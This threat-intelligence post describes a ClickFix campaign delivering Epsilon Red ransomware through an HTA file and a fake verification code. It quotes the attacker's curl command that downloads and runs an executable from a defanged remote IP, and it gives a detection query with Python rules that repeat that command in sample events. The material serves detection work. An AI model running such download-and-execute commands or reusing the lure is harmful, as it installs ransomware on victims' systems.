209. Threat Actors Leverage ClickFix to Deploy Epsilon Red Ransomware
Hello everyone!
Zero days without ClickFix. This time an adversary leveraged this technique to deploy Epsilon Red ransomware.
This time the "verification" step was a bit unusual: the victim had to save the copied data as an HTA file, run it, read the displayed code and paste it into another window.
First, the file executes a command to download and execute an Epsilon Red payload:
cmd /c cd /D %userprofile% && curl -s -o a.exe hxxp://155.94.155[.]227:2269/dw/vir.exe && a.exe
Next, it provides the "code":
cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause
And here we have an interesting detection opportunity:
event_type: "processcreatewin"
AND
proc_file_path: "cmd.exe"
AND
cmdline: ("echo" AND "verificatification code")
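The query above as working detection logic, added here as an example and not part of the original post. It runs the post's rule (cmd.exe echoing the misspelled "verificatification code") over a few constructed process-creation events whose field names mirror the query, and adds two assumptions of my own: a broader, noisier regex for any "echo ... verif... code" pattern, since the misspelling is specific to this campaign, and a heuristic for the stage-one chain quoted above (curl writing an .exe that is then executed in the same command line). Field layout and rule names are assumptions, not any product's schema.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample telemetry (not real logs). Field names follow the query
# in the post: event_type, proc_file_path, cmdline.
SAMPLE_EVENTS: List[Event] = [
    {   # stage 1 from the HTA: download-and-execute chain quoted in the post
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd /c cd /D %userprofile% && curl -s -o a.exe "
                   "hxxp://155.94.155[.]227:2269/dw/vir.exe && a.exe",
    },
    {   # stage 2: the fake "verification code" shown to the victim
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd /c echo Your Verificatification Code Is: "
                   "PC-19fj5e9i-cje8i3e4 && pause",
    },
    {   # benign echo from a build script: must not fire
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd /c echo Build finished && pause",
    },
    {   # same string, but not cmd.exe and not a Windows event: must not fire
        "event_type": "processcreatelinux",
        "proc_file_path": "/bin/sh",
        "cmdline": "sh -c 'echo verificatification code'",
    },
]


def _basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of / or \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_windows_cmd(event: Event) -> bool:
    """event_type: processcreatewin AND proc_file_path: cmd.exe."""
    return (event.get("event_type") == "processcreatewin"
            and _basename(event.get("proc_file_path", "")) == "cmd.exe")


def rule_fake_verification_code(event: Event) -> bool:
    """Literal port of the post's query: cmd.exe, cmdline has echo AND the
    misspelled 'verificatification code' (substring match, case-insensitive)."""
    if not _is_windows_cmd(event):
        return False
    cmdline = event.get("cmdline", "").lower()
    return "echo" in cmdline and "verificatification code" in cmdline


# Assumption (broader than the post): catch any spelling of "verif... code"
# echoed by cmd.exe. Expect more noise; tune against your own baseline.
_VERIF_BROAD = re.compile(r"\becho\b[^&|]*\bverif\w*\s+code\b", re.IGNORECASE)


def rule_echo_verification_code_broad(event: Event) -> bool:
    return _is_windows_cmd(event) and bool(_VERIF_BROAD.search(event.get("cmdline", "")))


# Assumption (stage-one heuristic): curl writes an .exe with -o and the same
# file name is executed after && in the same command line.
_CURL_RUN = re.compile(
    r"\bcurl\b[^&|]*\s-o\s+(\S+\.exe)\b[^&|]*&&\s*\1\b", re.IGNORECASE)


def rule_curl_download_and_execute(event: Event) -> bool:
    return _is_windows_cmd(event) and bool(_CURL_RUN.search(event.get("cmdline", "")))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("fake_verification_code", rule_fake_verification_code),
    ("echo_verification_code_broad", rule_echo_verification_code_broad),
    ("curl_download_and_execute", rule_curl_download_and_execute),
]


def scan(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    hits: List[Tuple[int, str]] = []
    for idx, event in enumerate(events):
        for name, rule in RULES:
            if rule(event):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"[{name}] event {idx}: {SAMPLE_EVENTS[idx]['cmdline']}")
```

The literal rule is precise because the attacker's typo is unusual in legitimate command lines; the broad variant and the curl heuristic trade that precision for coverage of the next campaign that fixes the spelling or renames the payload, so run them as hunting queries first and promote them only after checking false positives.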
See you tomorrow!